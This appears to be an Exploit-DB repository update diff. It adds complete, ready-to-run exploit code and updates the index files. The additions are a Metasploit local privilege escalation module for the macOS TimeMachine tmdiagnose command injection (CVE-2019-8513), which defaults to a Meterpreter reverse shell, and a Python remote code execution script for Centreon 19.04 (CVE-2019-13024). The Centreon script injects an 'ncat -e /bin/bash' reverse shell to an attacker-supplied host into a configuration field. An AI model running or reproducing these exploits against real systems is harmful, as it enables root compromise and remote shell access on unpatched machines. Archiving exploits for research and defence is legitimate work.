DB: 2019-07-03

2 changes to exploits/shellcodes

Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)

Linux Mint 18.3-19.1 - 'yelp' Command Injection
Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)

Centreon 19.04  - Remote Code Execution

Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)

exploits/macos/local/47070.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
+      'Description'   => %q{
+          This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
+        order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
+        from a command injection vulnerability that can be exploited by creating a
+        specially crafted disk label.
+
+          The tmdiagnose binary uses awk to list every mounted volume, and composes
+        shell commands based on the volume labels. By creating a volume label with the
+        backtick character, we can have our own binary executed with root priviledges.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'CodeColorist', # Discovery and exploit
+          'timwr',        # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-8513'],
+          ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
+          ['URL', 'https://support.apple.com/en-in/HT209600'],
+          ['URL', 'https://github.com/ChiChou/sploits'],
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload',               { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+      ],
+      'DisclosureDate' => 'Apr 13 2019'))
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def upload_executable_file(filepath, filedata)
+    print_status("Uploading file: '#{filepath}'")
+    write_file(filepath, filedata)
+    chmod(filepath)
+    register_file_for_cleanup(filepath)
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.14.4')
+      CheckCode::Safe
+    else
+      CheckCode::Appears
+    end
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
+    if target['Arch'] == ARCH_X64
+      root_cmd = payload.encoded
+    else
+      root_cmd = payload.raw
+      if target['Arch'] == ARCH_PYTHON
+        root_cmd = "echo \"#{root_cmd}\" | python"
+      end
+      root_cmd = "CMD:#{root_cmd}"
+    end
+    if root_cmd.length > 1024
+      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
+    end
+
+    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
+    exploit_data[placeholder_index, root_cmd.length] = root_cmd
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+    upload_executable_file(exploit_file, exploit_data)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec(exploit_file)
+    print_status("Exploit result:\n#{result}")
+  end
+end

exploits/php/webapps/47069.py

@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
+# Date: 28/06/2019
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2019-13024
+# Vendor Homepage: https://www.centreon.com/
+# Software link: https://download.centreon.com
+# Version: v19.04
+# Tested on: CentOS 7.6 / PHP 5.4.16
+'''
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+# turn off BeautifulSoup warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) != 6:
+    print(len(sys.argv))
+    print("[~] Usage : ./centreon-exploit.py url username password ip port")
+    exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+request = requests.session()
+print("[+] Retrieving CSRF token to submit the login form")
+page = request.get(url+"/index.php")
+html_content = page.text
+soup = BeautifulSoup(html_content)
+token = soup.findAll('input')[3].get("value")
+
+login_info = {
+    "useralias": username,
+    "password": password,
+    "submitLogin": "Connect",
+    "centreon_token": token
+}
+login_request = request.post(url+"/index.php", login_info)
+print("[+] Login token is : {0}".format(token))
+if "Your credentials are incorrect." not in login_request.text:
+    print("[+] Logged In Sucssfully")
+    print("[+] Retrieving Poller token")
+
+    poller_configuration_page = url + "/main.get.php?p=60901"
+    get_poller_token = request.get(poller_configuration_page)
+    poller_html = get_poller_token.text
+    poller_soup = BeautifulSoup(poller_html)
+    poller_token = poller_soup.findAll('input')[24].get("value")
+    print("[+] Poller token is : {0}".format(poller_token))
+
+    payload_info = {
+        "name": "Central",
+        "ns_ip_address": "127.0.0.1",
+        # this value should be 1 always
+        "localhost[localhost]": "1",
+        "is_default[is_default]": "0",
+        "remote_id": "",
+        "ssh_port": "22",
+        "init_script": "centengine",
+        # this value contains the payload , you can change it as you want
+        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
+        "nagiostats_bin": "/usr/sbin/centenginestats",
+        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
+        "centreonbroker_cfg_path": "/etc/centreon-broker",
+        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
+        "centreonbroker_logs_path": "",
+        "centreonconnector_path": "/usr/lib64/centreon-connector",
+        "init_script_centreontrapd": "centreontrapd",
+        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
+        "ns_activate[ns_activate]": "1",
+        "submitC": "Save",
+        "id": "1",
+        "o": "c",
+        "centreon_token": poller_token,
+
+
+    }
+
+    send_payload = request.post(poller_configuration_page, payload_info)
+    print("[+] Injecting Done, triggering the payload")
+    print("[+] Check your netcat listener !")
+    generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
+    xml_page_data = {
+        "poller": "1",
+        "debug": "true",
+        "generate": "true",
+    }
+    request.post(generate_xml_page, xml_page_data)
+
+else:
+    print("[-] Wrong credentials")
+    exit()

files_exploits.csv

@@ -10563,6 +10563,7 @@ id,file,description,date,author,type,platform,port
 47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
+47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17515,7 +17516,7 @@ id,file,description,date,author,type,platform,port
 47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
 47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
 47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
-47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection",2019-07-01,b1ack0wl,remote,linux,
+47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
 47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@@ -41452,3 +41453,4 @@ id,file,description,date,author,type,platform,port
 47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
 47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
 47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
+47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,

files_shellcodes.csv

@@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
 47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86